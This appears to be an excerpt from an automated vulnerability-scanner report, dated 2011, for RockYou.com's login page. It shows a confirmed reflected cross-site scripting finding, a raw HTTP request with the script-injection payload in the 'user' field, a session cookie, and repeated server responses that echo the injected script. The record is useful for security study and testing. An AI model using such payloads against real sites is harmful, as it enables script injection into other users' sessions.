<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000E4B)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000E4B)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="19..
Date: Mon, 18 Apr 2011 22:09:42 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:09:41 GMT; path=/; domain=.rockyou.com,lastlogin=1303164582; expires=Wed, 27-Jul-2011 22:09:42 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:09:42 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=91513 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9072
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000E4B)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000E4B)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="19..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| user | POST | '"--></style></script><script>alert(0x000EA4)</script> |
| mode | POST | login |
| pass | POST | 3 |
Request
POST /login.php?lang=en HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164621; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000EA4)%3c%2fscript%3e&mode=login&pass=3
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164621; ctid=1; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000EA4)%3c%2fscript%3e&mode=login&pass=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:10:22 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:10:22 GMT; path=/; domain=.rockyou.com,lastlogin=1303164622; expires=Wed, 27-Jul-2011 22:10:22 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:10:22 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=96126 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9052
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; 